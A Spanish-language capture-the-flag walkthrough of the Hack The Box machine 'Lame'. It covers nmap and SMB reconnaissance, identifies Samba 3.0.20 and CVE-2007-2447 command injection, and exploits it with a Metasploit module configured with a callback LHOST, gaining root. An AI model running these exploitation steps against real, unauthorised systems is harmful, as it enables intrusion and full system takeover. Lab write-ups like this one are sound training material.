# Lame

### 🔍 RECONOCIMIENTO

En primer lugar, tras conectarnos a la máquina, utilizamos el comando:

```bash
ping -c 1 10.10.10.3
```

para verificar la conectividad de red.

<figure><img src="https://469389308-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FbKXfRjFOYJgGlV1An6Cf%2Fuploads%2FCSLUo1Ugef0gn3eDKhmI%2FCaptura%20de%20pantalla%202025-02-15%20111453.png?alt=media&#x26;token=3f862f4a-ca9f-4acd-9fa0-fc220c8d1746" alt=""><figcaption></figcaption></figure>

A continuación, realizamos el comando:

```bash
nmap -sC -sV 10.10.10.3
```

para realizar un escaneo de puertos y servicios detallado en la dirección IP.

<figure><img src="https://469389308-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FbKXfRjFOYJgGlV1An6Cf%2Fuploads%2F49wpek8SjAlLHjrLq6E3%2Fimage.png?alt=media&#x26;token=a2505db3-1c91-4d19-8f6b-ad12d1b7fa45" alt=""><figcaption></figcaption></figure>

Durante el escaneo se identificaron los siguientes puertos abiertos:

* **21 (FTP)**: Protocolo de transferencia de archivos, puede permitir el acceso anónimo o credenciales débiles.
* **22 (SSH)**: Servicio de acceso remoto seguro, posible vector de ataque si se detectan credenciales débiles o exploits disponibles.
* **139, 445 (SMB)**: Protocolos de compartición de archivos en redes Windows, potencialmente expuestos a vulnerabilidades como SMB Relay o EternalBlue.

A continuación, se procederá a analizar cada uno de estos servicios en busca de posibles vectores de ataque.

### 🔎 EXPLORACIÓN

Se utiliza el comando:

```bash
sudo nmap -sCV -p21,22,139,445 -v 10.10.10.3
```

para que nos proporcione más información sobre esos puertos específicamente.

<figure><img src="https://469389308-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FbKXfRjFOYJgGlV1An6Cf%2Fuploads%2FzCSidDiK6u3lxpTnX7Xr%2Fimage.png?alt=media&#x26;token=0e8ab17b-746c-4f8a-9ac8-9d83685bf771" alt=""><figcaption></figcaption></figure>

Revisamos el puerto 21 con el usuario Anonymous.

```
ftp 10.10.10.3
```

No contiene nada.

<figure><img src="https://469389308-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FbKXfRjFOYJgGlV1An6Cf%2Fuploads%2FIGprkF5tb2cA4Em84kOM%2Fimage.png?alt=media&#x26;token=6796b3d1-b0da-489f-af4d-53001e870f05" alt=""><figcaption></figcaption></figure>

Miramos el protocolo SMB.

```bash
smbmap -H 10.10.10.3
```

<figure><img src="https://469389308-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FbKXfRjFOYJgGlV1An6Cf%2Fuploads%2FPE0iak199Vv1D5uVciDm%2Fimage.png?alt=media&#x26;token=a632bc53-35cf-4614-9960-90b5701f9301" alt=""><figcaption></figcaption></figure>

Vemos si es explotable a algún CVE.

```bash
nmap -p 445 --script smb-os-discovery,smb-protocols,smb2-capabilities 10.10.10.3
```

<figure><img src="https://469389308-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FbKXfRjFOYJgGlV1An6Cf%2Fuploads%2FqhVHvNEo8346TFT3iRqQ%2Fimage.png?alt=media&#x26;token=59df755a-9e7b-4fba-835f-e0785b4d93a9" alt=""><figcaption></figcaption></figure>

Dado que el sistema usa **Samba 3.0.20**, hay una vulnerabilidad conocida que permite **ejecución remota de código (RCE).**

**CVE-2007-2447 – Samba "username map script" Command Injection:** Esta vulnerabilidad permite ejecutar comandos arbitrarios en el servidor Samba si la opción **"username map script"** está habilitada en `smb.conf`.

### 🚀 **EXPLOTACIÓN**

Abrimos Metasploit para explotar esta vulnerabilidad.

```bash
search Samba 3.0.20
use 0
show options
set RHOSTS 10.10.10.3
set RPORT 445
set LHOST 10.10.14.7
run
```

<figure><img src="https://469389308-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FbKXfRjFOYJgGlV1An6Cf%2Fuploads%2FrNniuObpYarAU3XlypWN%2Fimage.png?alt=media&#x26;token=9bc06eae-b6d8-4ab2-9681-bc5885381ae2" alt=""><figcaption></figcaption></figure>

### 🔐 **PRIVILEGIOS**

Al estar dentro y ejecutar:

```bash
whoami
```

<figure><img src="https://469389308-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FbKXfRjFOYJgGlV1An6Cf%2Fuploads%2F1B4kaNSRtsl3xoSaYe7E%2Fimage.png?alt=media&#x26;token=027ea2b8-2522-4a02-a97a-979456996f81" alt=""><figcaption></figcaption></figure>

Somos **root**.

<figure><img src="https://469389308-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FbKXfRjFOYJgGlV1An6Cf%2Fuploads%2Fi1x1ZoFWOy2iU1o4tvEG%2Fimage.png?alt=media&#x26;token=ca130292-4fda-4634-8360-e2c5de17170b" alt=""><figcaption></figcaption></figure>
